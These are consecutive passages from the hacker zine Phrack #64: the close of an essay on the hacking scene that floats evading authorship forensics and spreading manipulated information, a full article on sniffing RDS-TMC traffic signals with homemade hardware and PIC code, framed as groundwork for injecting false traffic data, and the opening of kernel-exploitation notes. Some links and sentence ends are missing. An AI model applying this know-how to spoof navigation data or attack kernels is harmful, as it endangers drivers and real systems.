Bush write. Once the model created, he can give a text to the A.I. 
and this text will be translated in "George Bush Speaking". Author's 
answer (hacker factor) was to say it's not possible.

    For working in text-mining, I can tell you that it's possible. The
majority of people working in the academic area are blind and when you
come to them with innovative techniques, they generally say you that you
are a dreamer. A simple implementation can be realized quickly with the
use of a grammar (that you can even induct automatically), a thesaurus
and markov chains. Add some home made rules and you can have a small
system to modify a text.

    An idea could be to release a tool like this (the binary, not the
source). I already have the title for an article : "Defeating forensic:
how to cover your says" !

    More generally, in information warfare, interesting subjects could be:

* Innovative information retrieval techniques
* Automatic diffusion of manipulated information
* Tracking of manipulated information

    Military and advanced centers like DARPA are already interested in
these topics. We don't have to let governments have the monopoly on
these areas. I'm sure we can do much better than governments.

------[ 5.4.4 Spying System

    Everyone knows ECHELON, it's probably the most documented spying
system in the world. Unfortunately, the majority of the information that
you can find on ECHELON is where ECHELON bases in the world are. There is
nothing about how they manipulate data. It's evident that they are using
some data-mining techniques like speech recognition, text-cleaning, topic
classification, name entity recognition sentiment detection and so on. For
this they could use their own software or maybe they are using some
commercial software like:

Retrievalware from Convera :

Inxight's products:

"Minority Report" like system visualization:


    For now we are like Socrates, all we know is that we know nothing.
Nothing about how they process data. But we are very interested to know.

    In the same vein, we would like to know more on Narus
(, which could be used as the successor of 
CARNIVORE which was the FBI's tools to intercept electronic data. Which 
countries use Narus, where it is installed, how is Narus processing 

    Actually any system which is supposed to spy on us is interesting.

--[ 6. Conclusion

    I'm reaching the end of my subject. Like with every articles some
people will agree with the content and some not. I'm probably not the best
person for talking about the Underground but I tried to resume in
this text all the interesting discussions I had for several years with a 
lot of people. I tried to analyze the past and present scene and to give 
you a snapshot as accurate as possible.

    I'm not entirely satisfied, there's a lot more to say. But if this
article can already make you thinking about the current scene or
the Underground in general, that means that we are on the good way.

    The most important thing to retain is the need to get back the
Underground spirit. The world changes, people change, the security world
changes but the Underground has to keep its spirit, the spirit which
characterized it in the past.

    I gave you some ideas about how we could do it, but there are much
more ideas in 10000 heads than in one. Anyone who worry about the current
scene is invited to give his opinion about how we could do it.

    So let's go for the wakeup of the Underground. THE wakeup. A wakeup
to show to the world that the Underground is not dead. That it will never
die, that it is still alive and for a long time.

    Thats the responsibility of all hackers around the world.


              _                                                _
            _/B\_                                            _/W\_
            (* *)             Phrack #64 file 5              (* *)
            | - |                                            | - |
            |   |     Hijacking RDS-TMC Traffic Information  |   |
            |   |                   signals                  |   |
            |   |                                            |   |
            |   |       by Andrea "lcars" Barisani           |   |
            |   |            <>         |   |                              
            |   |          Daniele "danbia" Bianco           |   |
            |   |            <>        |   |

--[ Contents

1. - Introduction
2. - Motivation
3. - RDS
4. - RDS-TMC
2. - Sniffing circuitry
4. - Simple RDS Decoder v0.1 
5. - Links

--[ 1. Introduction

Modern Satellite Navigation systems use a recently developed standard
called RDS-TMC (Radio Data System - Traffic Message Channel) for receiving
traffic information over FM broadcast. The protocol allows communication of
traffic events such as accidents and queues. If information affects the
current route plotted by the user the information is used for calculating
and suggesting detours and alternate routes. We are going to show how to
receive and decode RDS-TMC packets using cheap homemade hardware, the goal
is understanding the protocol so that eventually we may show how trivial it
is to inject false information.

We also include the first release of our Simple RDS Decoder (srdsd is the
lazy name) which as far as we know is the first open source tool available
which tries to fully decode RDS-TMC messages. It's not restricted to
RDS-TMC since it also performs basic decoding of RDS messages.

The second part of the article will cover transmission of RDS-TMC messages,
satellite navigator hacking via TMC and its impact for social engineering

--[ 2. Motivation

RDS has primarily been used for displaying broadcasting station names on FM
radios and give alternate frequencies, there has been little value other
than pure research and fun in hijacking it to display custom messages.

However, with the recent introduction of RDS-TMC throughout Europe we are
seeing valuable data being transmitted over FM that actively affects SatNav
operations and eventually the driver's route choice. This can
have very important social engineering consequences. Additionally, RDS-TMC
messages can be an attack vector against SatNav parsing capabilities.

Considering the increasing importance of these system's role in car
operation (which are no longer strictly limited to route plotting anymore)
and their human interaction they represent an interesting target combined
with the "cleartext" and un-authenticated nature of RDS/RDS-TMC messages.

We'll explore the security aspects in Part II.

--[ 3. RDS

The Radio Data System standard is widely adopted on pretty much every
modern FM radio, 99.9% of all car FM radio models feature RDS nowadays.
The standard is used for transmitting data over FM broadcasts and RDS-TMC
is a subset of the type of messages it can handle. The RDS standard is
described in the European Standard 50067.

The most recognizable data transmitted over RDS is the station name which
is often shown on your radio display, other information include alternate
frequencies for the station (that can be tried when the signal is lost),
descriptive information about the program type, traffic announcements (most
radio can be set up to interrupt CD and/or tape playing and switch to radio
when a traffic announcement is detected), time and date and many more
including TMC messages.

In a FM transmission the RDS signal is transmitted on a 57k subcarrier in
order to separate the data channel from the Mono and/or Stereo audio.

FM Spectrum:

  Mono   Pilot Tone   Stereo (L-R)     RDS Signal
   ^         ^           ^   ^            ^^
 ||||||||||  |   ||||||||||  ||||||||||   ||
 ||||||||||  |   ||||||||||  ||||||||||   ||
 ||||||||||  |   ||||||||||  ||||||||||   || 
 ||||||||||  |   ||||||||||  ||||||||||   ||
 ||||||||||  |   ||||||||||  ||||||||||   ||
            19k 23k        38k        53k 57k              Freq (Hz)

The RDS signal is sampled against a clock frequency of 1.11875 kHz, this
means that the data rate is 1187.5 bit/s (with a maximum deviation of +/-
0.125 bit/s).

The wave amplitude is decoded in a binary representation so the actual data
stream will be friendly '1' and '0'.

The RDS smallest "packet" is called a Block, 4 Blocks represent a Group. Each
Block has 26 bits of information making a Group 104 bits large.

Group structure (104 bits):

| Block 1 | Block 2 | Block 3 | Block 4 |

Block structure (26 bits):

 ---------------- ---------------------
| Data (16 bits) | Checkword (10 bits) |
 ---------------- ---------------------

The Checkword is a checksum included in every Block computed for error
protection, the very nature of analog radio transmission introduces many
errors in data streams. The algorithm used is fully specified in the
standard and it doesn't concern us for the moment.

Here's a representation of the most basic RDS Group:

Block 1:

 ---------------------              PI code   = 16 bits 
| PI code | Checkword |             Checkword = 10 bits

Block 2:                                               Group code = 4  bits
                                                       B0         = 1  bit
 ---------------------------------------------------   TP         = 1  bit 
| Group code | B0 | TP | PTY | <5 bits> | Checkword |  PTY        = 5  bits
 ---------------------------------------------------   Checkword  = 10 bits

Block 3:

 ------------------                 Data      = 16 bits
| Data | Checkword |                Checkword = 10 bits

Block 4:

 ------------------                 Data      = 16 bits
| Data | Checkword |                Checkword = 10 bits

The PI code is the Programme Identification code, it identifies the radio
station that's transmitting the message. Every broadcaster has a unique
assigned code.

The Group code identifies the type of message being transmitted as RDS can
be used for transmitting several different message formats. Type 0A (00000)
and 0B (00001) for instance are used for tuning information. RDS-TMC
messages are transmitted in 8A (10000) groups. Depending on the Group type
the remaining 5 bits of Block 2 and the Data part of Block 3 and Block 4
are used according to the relevant Group specification.

The 'B0' bit is the version code, '0' stands for RDS version A, '1' stands
for RDS version B.

The TP bit stands for Traffic Programme and identifies if the station is
capable of sending traffic announcements (in combination with the TA code
present in 0A, 0B, 14B, 15B type messages), it has nothing to do with
RDS-TMC and it refers to audio traffic announcements only.

The PTY code is used for describing the Programme Type, for instance code 1
(converted in decimal from its binary representation) is 'News' while code
4 is 'Sport'.

--[ 4. RDS-TMC

Traffic Message Channel packets carry information about traffic events,
their location and the duration of the event. A number of lookup tables are
being used to correlate event codes to their description and location
codes to the GPS coordinates, those tables are expected to be present in
our SatNav memory. The RDS-TMC standard is described in International
Standard (ISO) 14819-1.

All the most recent SatNav systems supports RDS-TMC to some degree, some
systems requires purchase of an external antenna in order to correctly receive
the signal, modern ones integrated in the car cockpit uses the existing FM
antenna used by the radio system. The interface of the SatNav allows
display of the list of received messages and prompts detours upon events
that affect the current route.

TMC packets are transmitted as type 8A (10000) Groups and they can be
divided in two categories: Single Group messages and Multi Group messages.
Single Group messages have bit number 13 of Block 2 set to '1', Multi Group
messages have bit number 13 of Block 2 set to '0'.

Here's a Single Group RDS-TMC message:

Block 1:

 ---------------------              PI code   = 16 bits 
| PI code | Checkword |             Checkword = 10 bits

Block 2:                                                Group code = 4  bits
                                                        B0         = 1  bit
 -----------------------------------------------------  TP         = 1  bit 
| Group code | B0 | TP | PTY | T | F | DP | Checkword | PTY        = 5  bits
 -----------------------------------------------------  Checkword  = 10 bits

 T = 1 bit    DP = 3 bits  
 F = 1 bit    

Block 3:                                                D          = 1 bit 
                                                        PN         = 1 bit
 -------------------------------------                  Extent     = 3 bits
| D | PN | Extent | Event | Checkword |                 Event      = 11 bits
 -------------------------------------                  Checkword  = 10 bits

Block 4:

 ----------------------             Location  = 16 bits
| Location | Checkword |            Checkword = 10 bits

We can see the usual data which we already discussed for RDS as well as new
information (the <5 bits> are now described).

We already mentioned the 'F' bit, it's bit number 13 of Block 2 and it
identifies the message as a Single Group (F = 1) or Multi Group (F = 0). 

The 'T', 'F' and 'D' bits are used in Multi Group messages for identifying if
this is the first group (TFD = 001) or a subsequent group (TFD = 000) in the

The 'DP' bit stands for duration and persistence, it contains information
about the timeframe of the traffic event so that the client can
automatically flush old ones.

The 'D' bit tells the SatNav if diversion advice needs to be prompted or

The 'PN' bit (Positive/Negative) indicates the direction of queue events,
it's opposite to the road direction since it represent the direction of the
growth of a queue (or any directional event).

The 'Extent' data shows the extension of the current event, it is measured
in terms of nearby Location Table entries.

The 'Event' part contains the 11 bit Event code, which is looked up on the
local Event Code table stored on the SatNav memory. The 'Location' part
contains the 16 bit Location code which is looked up against the Location
Table database, also stored on your SatNav memory, some countries allow a
free download of the Location Table database (like Italy[1]).

Multi Group messages are a sequence of two or more 8A groups and can
contain additional information such as speed limit advices and
supplementary information.

--[ 5. Sniffing circuitry

Sniffing RDS traffic basically requires three components:

1. FM radio with MPX output
2. RDS signal demodulator
3. RDS protocol decoder

The first element is a FM radio receiver capable of giving us a signal that
has not already been demodulated in its different components since we need
access to the RDS subcarrier (and an audio only output would do no good).
This kind of "raw" signal is called MPX (Multiplex). The easiest way to get
such signal is to buy a standard PCI Video card that carries a tuner
which has a MPX pin that we can hook to.

One of these tuners is Philips FM1216[2] (available in different
"flavours", they all do the trick) which provides pin 25 for this purpose.
It's relatively easy to identify a PCI Video card that uses this tuner, we
used the WinFast DV2000. An extensive database[3] is available.

Once we get the MPX signal it can then be connect to a RDS signal
demodulator which will perform the de-modulation and gives us parsable
data. Our choice is ST Microelectronics TDA7330B[4], a commercially
available chip used in most radio capable of RDS de-modulation. Another
possibility could be the Philips SAA6579[5], it offers the same
functionality of the TDA7330, pinning might differ.

Finally we use custom PIC (Peripheral Interface Controller) for preparing
and sending the information generated by the TDA7330 to something that we
can understand and use, like a standard serial port.  

The PIC brings DATA, QUAL and CLOCK from demodulator and "creates" a
stream good enough to be sent to the serial port. Our PIC uses only two
pins of the serial port (RX - RTS), it prints out ascii '0' and '1'
clocked at 19200 baud rate with one start bit and two stop bits, no parity
bit is used. 

As you can see the PIC makes our life easier, in order to see the raw
stream we only have to connect the circuit and attach a terminal to the
serial port, no particular driver is needed. The PIC we use is a PIC 16F84,
this microcontroller is cheap and easy to work with (its assembly has only
35 instructions), furthermore a programmer for setting up the chip can be
easily bought or assembled. If you want to build your own programmer a good
choice would be uJDM[6], it's one of the simplest PIC programmers available
(it is a variation of the famous JDM programmer).

At last we need to convert signals from the PIC to RS232 compatible signal
levels. This is needed because the PIC and other integrated circuits works
under TTL (Transistor to Transistor Logic - 0V/+5V), whereas serial port
signal levels are -12V/+12V. The easiest approach for converting the signal
is using a Maxim RS-232[7]. It is a specialized driver and receiver
integrated circuit used to convert between TTL logic levels and RS-232
compatible signal levels.

Here's the diagram of the setup:

                \   /
                 \ / 
                  |                     [ RDS - Demodulator ]
                  |                           *diagram*
   ______________[ ]__
  |-        ||        |=-                         
  |-        ||  F T   |=-
  |-        ||  M U   |=-
P |-        ||  1 N   |=- 
C |-        ||  2 E   |=-                 
I |-        ||  1 R   |=-                  
  |-        ||  6     |=-                           1  _______  20
B |         ||________|=- --------> MPX  --->  MUXIN -|.  U   |-
u |-                  | pin 25                       -|       |-
s |-                  | AF sound output              -|   T   |-
  |-                  |                              -|   D   |-
  |-                  |                              -|   A   |-
  |-                  |                              -|   7   |-
  |-                  |                              -|   3   |- QUAL______
  |-                  |                              -|   3   |- DATA____  |
  |-                  |                              -|   0   |- CLOCK_  | |
  |___________________|                              -|_______|-       | | V
                                                   10          11      | V |
        _______________________________________________________________V | |
       |      ___________________________________________________________| |
       |  ___|_____________________________________________________________|
       | |   |
       | |   |           1  _______  18
       V |   V          x -|.  u   |- -> data out (to rs232)______________
       | V   |          x -|       |- -> rts  out (to rs232)____________  |
       | |  _|          x -|   1   |- <- osc1 / clkin                   | |
       | | |      MCLR -> -|   6   |- -> OSC2 / CLKOUT                  | V
       | | | Vss (gnd) -> -|   F   |- <- Vdd (+5V)                      V |
       | | |_____ DATA -> -|   8   |- x                                 | |
       | |_______ QUAL -> -|   4   |- x                                 | |
       |________ CLOCK -> -|       |- x                                 | |
                        x -|_______|- x                                 | |
                         9           10                                 | |
                                       ______________________________   | |
    Serial Port                       |            1  _______  16    |  | |
   (DB9 connector)                    |             -|.  U   |-      ^  | | 
              ______________          |             -|       |-      |  | |
             | RX - pin2    |         |             -|   R   |- RTS _|  | |
         ____V________      |         |             -|   S   |-         V |
        |  . o . . .  |     |         |             -|   2   |-         | V 
         \  . o . .  /      |         |             -|   3   |- <- _____| |
           ---------        |_________|____ <- DATA -|   2   |- <- _______|
              ^ RTS - pin 7           |             -|_______|-         
              |_______________________|            8           9       

Here's the commented assembler code for our PIC:

; Copyright 2007 Andrea Barisani <>
;                Daniele Bianco <>
; Permission to use, copy, modify, and distribute this software for any
; purpose with or without fee is hereby granted, provided that the above
; copyright notice and this permission notice appear in all copies.
; Pin diagram:   
;                   1  _______  18
;                  x -|.  U   |- -> DATA out (to RS232)
;                  x -|       |- -> RTS  out (to RS232)
;                  x -|   1   |- <- OSC1 / CLKIN 
;            MCLR -> -|   6   |- -> OSC2 / CLKOUT
;       Vss (gnd) -> -|   F   |- <- Vdd (+5V)
;            DATA -> -|   8   |- x   
;            QUAL -> -|   4   |- x
;           CLOCK -> -|       |- x
;                  x -|_______|- x
;                   9           10 
; Connection description:
; pin 4 : MCLR          (it must be connected to Vdd through a resistor
;                        to prevent PIC reset - 10K is a good resistor)
; pin 5 : Vss           (directly connected to gnd)
; pin 6 : DATA  input   (directly connected to RDS demodulator DATA  out)
; pin 7 : QUAL  input   (directly connected to RDS demodulator QUAL  out)
; pin 8 : CLOCK input   (directly connected to RDS demodulator CLOCK out)
; pin 14: Vdd           (directly connected to +5V)
; pin 15: OSC2 / CLKOUT (connected to an 2.4576 MHz oscillator crystal* )
; pin 16: OSC1 / CLKIN  (connected to an 2.4576 MHz oscillator crystal* )
; pin 17: RTS  output   (RS232 - ''RTS'' pin 7 on DB9 connector** )
; pin 18: DATA output   (RS232 - ''RX''  pin 2 on DB9 connector** )
; pin 1,2,3,9,10,11,12,13: unused
; *)
; We can connect the oscillator crystal to the PIC using this simple 
; circuit:
;                C1 (15-33 pF)
;              ____||____ ______ OSC1 / CLKIN  
;             |    ||    |     
;             |         ___
;      gnd ---|          =  XTAL (2.4576 MHz)
;             |         ---
;             |____||____|______ 
;                  ||            OSC2 / CLKOUT
;                C2 (15-33 pF)
; **) 
; We have to convert signals TTL <-> RS232 before we send/receive them 
; to/from the serial port. 
; Serial terminal configuration:
; 8-N-2 (8 data bits - No parity - 2 stop bits)

; HARDWARE CONF -----------------------
    PROCESSOR    16f84
    RADIX        DEC
    INCLUDE      ""

    ERRORLEVEL   -302                  ; suppress warnings for bank1

    __CONFIG 1111111110001b            ; Code Protection  disabled
                                       ; Power Up Timer    enabled
                                       ; WatchDog Timer   disabled
                                       ; Oscillator type        XT
; -------------------------------------

; DEFINE ------------------------------
#define    Bank0     bcf  STATUS, RP0  ; activates bank 0
#define    Bank1     bsf  STATUS, RP0  ; activates bank 1

#define    Send_0    bcf     PORTA, 1  ; send 0 to RS232 RX
#define    Send_1    bsf     PORTA, 1  ; send 1 to RS232 RX
#define    Skip_if_C btfss  STATUS, C  ; skip if C FLAG is set

#define    RTS               PORTA, 0  ; RTS   pin RA0
#define    RX                PORTA, 1  ; RX    pin RA1
#define    DATA              PORTB, 0  ; DATA  pin RB0
#define    QUAL              PORTB, 1  ; QUAL  pin RB1
#define    CLOCK             PORTB, 2  ; CLOCK pin RB2

RS232_data     equ               0x0C  ; char to transmit to RS232
BIT_counter    equ               0x0D  ; n. of bits to transmit to RS232
RAW_data       equ               0x0E  ; RAW data (from RDS demodulator)
dummy_counter  equ               0x0F  ; dummy counter... used for delays
; -------------------------------------

; BEGIN PROGRAM CODE ------------------

    ORG    000h

    Bank1                              ; select bank 1
    movlw  00000000b                   ; RA0-RA4 output
    movwf  TRISA                       ;
    movlw  00000111b                   ; RB0-RB2 input / RB3-RB7 output
    movwf  TRISB                       ;
    Bank0                              ; select bank 0
    movlw  00000010b                   ; set voltage at -12V to RS232 ''RX''
    movwf  PORTA                       ;

    btfsc  CLOCK                       ; wait for clock edge (high -> low)
    goto   Main                        ;

    movfw  PORTB                       ; 
    andlw  00000011b                   ; reads levels on PORTB and send
    movwf  RAW_data                    ; data to RS232
    call   RS232_Tx                    ; 

    btfss  CLOCK                       ; wait for clock edge (low -> high)
    goto   $-1                         ;               
    goto   Main

RS232_Tx                               ; RS232 (19200 baud rate) 8-N-2
                                       ; 1 start+8 data+2 stop - No parity  
    btfsc  RAW_data,1
    goto   Good_qual
    goto   Bad_qual
Good_qual                              ; 
    movlw  00000001b                   ;
    andwf  RAW_data,w                  ; good quality signal 
    iorlw  '0'                         ; sends '0' or '1' to RS232
    movwf  RS232_data                  ; 
    goto   Char_Tx

Bad_qual                               ;
    movlw  00000001b                   ;
    andwf  RAW_data,w                  ; bad  quality signal     
    iorlw  '*'                         ; sends '*' or '+' to RS232
    movwf  RS232_data                  ;

    movlw  9                           ; (8 bits to transmit)
    movwf  BIT_counter                 ; BIT_counter = n. bits + 1

    call   StartBit                    ; sends start bit

    decfsz BIT_counter, f              ; sends all data bits contained in
    goto   Send_data_bit               ; RS232_data

    call   StopBit                     ; sends 2 stop bit and returns to Main

    goto   Delay16
    goto   Delay16


    call   Delay8
    goto   Delay16

    goto   Delay16

    goto   Delay16

    rrf    RS232_data, f               ; result of rotation is saved in
    Skip_if_C                          ; C FLAG, so skip if FLAG is set
    goto   Send_zero
    call   Send_1_
    goto   Send_loop
    call   Send_0_
    goto   Send_loop
; 4 / clock = ''normal'' instruction period (1 machine cycle )
; 8 / clock = ''branch'' instruction period (2 machine cycles)
;     clock            normal instr.           branch instr. 
;   2.4576 MHz           1.6276 us               3.2552 us

    movlw  2                           ; dummy cycle,
    movwf  dummy_counter               ; used only to get correct delay
                                       ; for timing.
    decfsz dummy_counter,f             ; 
    goto  $-1                          ; Total delay: 8 machine cycles
    nop                                ; ( 1 + 1 + 1 + 2 + 2 + 1 = 8 )

    movlw  2                           ; dummy cycle,
    movwf  dummy_counter               ; used only to get correct delay
                                       ; for timing.
    decfsz dummy_counter,f             ; 
    goto   $-1                         ; Total delay: 7 machine cycles
                                       ; ( 1 + 1 + 1 + 2 + 2 = 7 )

    RETURN                             ; unique return point


; END PROGRAM CODE --------------------


Using the circuit we assembled we can "sniff" RDS traffic directly on the
serial port using screen, minicom or whatever terminal app you like.
You should configure your terminal before attaching it to the serial port,
the settings are 19200 baud rate, 8 data bits, 2 stop bits, no parity.

# stty -F /dev/ttyS0 19200 cs8 cstopb -parenb
speed 19200 baud; rows 0; columns 0; line = 0; intr = ^C; quit = ^\; 
erase = ^?; kill = ^H; eof = ^D; eol = <undef>; eol2 = <undef>;
swtch = <undef>; start = ^Q; stop = ^S; susp = ^Z; rprnt = ^R;
werase = ^W; lnext = ^V; flush = ^O; min = 100; time = 2; -parenb -parodd 
cs8 -hupcl cstopb cread clocal crtscts -ignbrk brkint ignpar -parmrk -inpck
-istrip -inlcr -igncr -icrnl -ixon -ixoff -iuclc -ixany -imaxbel -iutf8
-opost -olcuc -ocrnl -onlcr -onocr -onlret -ofill -ofdel nl0 cr0 tab0 bs0 
vt0 ff0 -isig -icanon iexten -echo echoe echok -echonl -noflsh -xcase 
-tostop -echoprt echoctl echoke

# screen /dev/ttyS0 19200
0011101100010011000100000+000000000 ... <and so on>

As you can see we get '0' and '1' as well as '*' and '+', this is because
the circuit estimates the quality of the signal. '*' and '+' are bad
quality '0' and '1' data. We ignore bad data and only accept good quality.
Bad quality data should be ignored, and if you see a relevant amount of '*'
and '+' in your stream verify the tuner settings.  

In order to identify the beginning of an RDS message and find the right
offset we "lock" against the PI code, which is present at the beginning of
every RDS group. PI codes for every FM radio station are publicly available
on the Internet, if you know the frequency you are listening to then you
can figure out the PI code and look for it. If you have no clue about what
the PI code might be a way for finding it out is seeking the most recurring
16 bit string, which is likely to be the PI code.

Here's a single raw RDS Group with PI 5401 (hexadecimal conversion of


Let's separate the different sections:

0101010000000001 1111011001 0000  01 0  0001 01000    1100101100 0000001000010100 0000110010 0101001001000001 0001101110
PI code          Checkword  Group B0 TP PTY  <5 bits> Checkword  Data             Checkword  Data             Checkword

So we can isolate and identify RDS messages, now you can either parse them
visually by reading the specs (not a very scalable way we might say) or use
a tool like our Simple RDS Decoder.

--[ 10. Simple RDS Decoder 0.1

The tool parses basic RDS messages and 0A Group (more Group decoding will
be implemented in future versions) and performs full decoding of Single
group RDS-TMC messages (Multi Group support is also planned for future

Here's the basic usage:

# ./srdsd -h

Simple RDS-TMC Decoder 0.1     ||
Copyright 2007 Andrea Barisani || <>
Usage: ./ [-h|-H|-P|-t] [-d <location db path>] [-p <PI number>] <input file>
   -t display only tmc packets
   -H HTML output (outputs to /tmp/rds-*.html)
   -p PI number
   -P PI search
   -d location db path
   -h this help

Note: -d option expects a DAT Location Table code according to TMCF-LT-EF-MFF-v06 
      standard (2005/05/11)

As we mentioned the first step is finding the PI for your RDS stream, if you
don't know it already you can use '-P' option:

# ./srdsd -P rds_dump.raw | tail

0010000110000000: 4140 (2180)
1000011000000001: 4146 (8601)
0001100000000101: 4158 (1805)
1001000011000000: 4160 (90c0)
0000110000000010: 4163 (0c02)
0110000000010100: 4163 (6014)
0011000000001010: 4164 (300a)
0100100001100000: 4167 (4860)
1010010000110000: 4172 (a430)
0101001000011000: 4185 (5218)

Here 5218 looks like a reasonable candidate being the most recurrent
string. Let's try it:

# ./srdsd -p 5218 -d ~/loc_db/ rds_dump.raw

Reading TMC Location Table at ~/loc_db/:
	 parsing NAMES: 13135 entries
	 parsing ROADS: 1011 entries
	 parsing SEGMENTS: 15 entries
	 parsing POINTS: 12501 entries

Got RDS message (frame 1)
	Programme Identification: 0101001000011000 (5218)
	Group type code/version: 0000/0 (0A  - Tuning)
	Traffic Program: 1
	Programme Type: 01001 (9  - Varied Speech)
	Block 2: 01110
	Block 3: 1111100000010110
	Block 4: 0011000000110010
	Decoded 0A group:
		Traffic Announcement: 0
		Music Speech switch: 0
		Decoder Identification control: 110 (Artificial Head / PS char 5,6)
		Alternative Frequencies: 11111000, 00010110 (112.3, 89.7)
		Programme Service name: 0011000000110010 (02)
		Collected PSN: 02


Got RDS message (frame 76)
	Programme Identification: 0101001000011000 (5218)
	Group type code/version: 1000/0 (8A  - TMC)
	Traffic Program: 1
	Programme Type: 01001 (9  - Varied Speech)
	Block 2: 01000
	Block 3: 0101100001110011
	Block 4: 0000110000001100
	Decoded 8A group:
		Bit X4: 0 (User message)
		Bit X3: 1 (Single-group message)
		Duration and Persistence: 000 (no explicit duration given)
		Diversion advice: 0
		Direction: 1 (-)
		Extent: 011 (3)
		Event: 00001110011 (115 - slow traffic (with average speeds Q))
		Location: 0000110000001100 (3084)
		Decoded Location:
			Location code type: POINT
			Name ID: 11013 (Sv. Grande Raccordo Anulare)
			Road code: 266 (Roma-Ss16)
			GPS: 41.98449 N 12.49321 E

...and so on.

The 'Collected PSN' variable holds all the character of Programme Service
name seen so far, this way we can track (just like RDS FM Radio do) the
name of the station:

# ./srdsd -p 5201 rds_dump.raw | grep "Collected PSN" | head

		Collected PSN: DI
		Collected PSN: DIO1
		Collected PSN: DIO1  
		Collected PSN: RADIO1  
		Collected PSN: RADIO1  

Check out '-H' switch for html'ized output in /tmp (which can be useful for
directly following the Google Map links). We also have a version that plots
all the traffic on Google Map using their API, if you are interested in it
just email us.

Have fun.

--[ I. References

[1] - Italian RDS-TMC Location Table Database

[2] - Philips FM1216 DataSheet

[3] - PVR Hardware Database

[4] - SGS-Thompson Microelectronics TDA7330

[5] - Philips SAA6579

[6] - uJDM PIC Programmer

[7] - Maxim RS-232

[8] - Xcircuit 

--[ II. Code

Code also available at

<++> Simple RDS Decoder 0.1 - srdsd.uue

begin 644 srdsd

<--> Simple RDS Decoder 0.1 - srdsd.uue

Here's the schematic of the RDS Demodulator. You can directly use it to
view / print the circuit or import the file with Xcircuit[9] to
modify the diagram.


begin 644


|=[ EOF ]=---------------------------------------------------------------=|


            _                                                  _
          _/B\_                                              _/W\_
          (* *)              Phrack #64 file 6               (* *)
          | - |                                              | - |
          |   | Attacking the Core : Kernel Exploiting Notes |   |
          |   |                                              |   |
          |   |       By sqrkkyu <>     |   |
          |   |          twzi <>                |   |
          |   |                                              |   |

                             ==Phrack Inc.==

               Volume 0x00, Issue 0x00, Phile #0x00 of 0x00

|=------------=[ Attacking the Core : Kernel Exploiting Notes ]=---------=|
|=-------------=[ and ]=-------------=|
|=------------------------=[ February 12 2007 ]=-------------------------=|

------[  Index 

  1 - The playground 

    1.1 - Kernel/Userland virtual address space layouts
    1.2 - Dummy device driver and real vulnerabilities
    1.3 - Notes about information gathering

  2 - Kernel vulnerabilities and bugs 

    2.1 - NULL/userspace dereference vulnerabilities
        2.1.1 - NULL/userspace dereference vulnerabilities : null_deref.c 
    2.2 - The Slab Allocator
        2.2.1 - Slab overflow vulnerabilities
        2.2.2 - Slab overflow exploiting : MCAST_MSFILTER
        2.2.3 - Slab overflow vulnerabilities : Solaris notes 
    2.3 - Stack overflow vulnerabilities 
        2.3.1 - UltraSPARC exploiting
        2.3.2 - A reliable Solaris/UltraSPARC exploit
    2.4 - A primer on logical bugs : race conditions 
        2.4.1 - Forcing a kernel path to sleep
        2.4.2 - AMD64 and race condition exploiting: sendmsg

  3 - Advanced scenarios 
    3.1 - PaX KERNEXEC & separated kernel/user space 
    3.2 - Remote Kernel Exploiting 
        3.2.1 - The Network Contest
        3.2.2 - Stack Frame Flow Recovery
        3.2.3 - Resources Restoring 
        3.2.4 - Copying the Stub
        3.2.5 - Executing Code in Userspace Context [Gimme Life!]
        3.2.6 - The Code : sendtwsk.c

  4 - Final words  

  5 - References

  6 - Sources : drivers and exploits [stuff.tgz]      

------[ Intro 

The latest years have seen an increasing interest towards kernel based
explotation. The growing diffusion of "security prevention" approaches
(no-exec stack, no-exec heap, ascii-armored library mmapping, mmap/stack
and generally virtual layout randomization, just to point out the most
known) has/is made/making userland explotation harder and harder. 
Moreover there has been an extensive work of auditing on application codes,
so that new bugs are generally more complex to handle and exploit. 

The attentions has so turned towards the core of the operating systems,
towards kernel (in)security. This paper will attempt to give an insight
into kernel explotation, with examples for IA-32, UltraSPARC and AMD64. 
Linux and Solaris will be the target operating systems. More precisely, an
architecture on turn will be the main covered for the three main
exploiting demonstration categories : slab (IA-32), stack (UltraSPARC) and
race condtion (AMD64). The details explained in those 'deep focus' apply,
thou, almost in toto to all the others exploiting scenarios.     

Since explotation examples are surely interesting but usually do not show
the "effective" complexity of taking advantages of vulnerabilities, a
couple of working real-life exploits will be presented too.   

------[ 1 - The playground 

Let's just point out that, before starting : "bruteforcing" and "kernel"
aren't two words that go well together. One can't just crash over and
over the kernel trying to guess the right return address or the good
alignment. An error in kernel explotation leads usually to a crash,
panic or unstable state of the operating system.
The "information gathering" step is so definitely important, just like
a good knowledge of the operating system layout.  

---[ 1.1 - Kernel/Userland virtual address space layouts 

From the userland point of view, we don't see almost anything of the
kernel layout nor of the addresses at which it is mapped [there are
indeed a couple of information that we can gather from userland, and
we're going to point them out after]. 
Netherless it is from the userland that we have to start to carry out our
attack and so a good knowledge of the kernel virtual memory layout
(and implementation) is, indeed, a must. 

There are two possible address space layouts :

- kernel space on behalf of user space (kernel page tables are
replicated over every process; the virtual address space is splitted in
two parts, one for the kernel and one for the processes).  
Kernels running on x86, AMD64 and sun4m/sun4d architectures usually have
this kind of implementation. 

- separated kernel and process address space (both can use the whole
address space). Such an implementation, to be efficient, requires a 
dedicated support from the underlaining architecture. It is the case of
the primary and secondary context register used in conjunction with the
ASI identifiers on the UltraSPARC (sun4u/sun4v) architecture.   

To see the main advantage (from an exploiting perspective) of the first
approach over the second one we need to introduce the concept of
"process context".   
Any time the CPU is in "supervisor" mode (the well-known ring0 on ia-32),
the kernel path it is executing is said to be in interrupt context if it
hasn't a backing process.
Code in interrupt context can't block (for example waiting for demand
paging to bring in a referenced userspace page): the scheduler is
unable to know what to put to sleep (and what to wake up after). 

Code running in process context has instead an associated process
(usually the one that "generated" the kernel code path, for example
issuing a systemcall) and is free to block/sleep (and so, it's free to
reference the userland virtual address space). 
This is a good news on systems which implement a combined user/kernel
address space, since, while executing at kernel level, we can
dereference (or jump to) userland addresses. 
The advantages are obvious (and many) :

  - we don't have to "guess" where our shellcode will be and we can
    write it in C (which makes easier the writing, if needed, of long and
    somehow complex recovery code)

  - we don't have to face the problem of finding a suitable large and
    safe place to store it. 

  - we don't have to worry about no-exec page protection (we're free to
    mmap/mremap as we wish, and, obviously, load directly the code in
    .text segment, if we don't need to patch it at runtime). 

  - we can mmap large portions of the address space and fill them with 
    nops or nop-alike code/data (useful when we don't completely
    control the return address or the dereference)

  - we can easily take advantage of the so-called "NULL pointer
    dereference bugs" ("technically" described later on)
The space left to the kernel is so limited in size : on the x86
architecture it is 1 Gigabyte on Linux and it fluctuates on Solaris
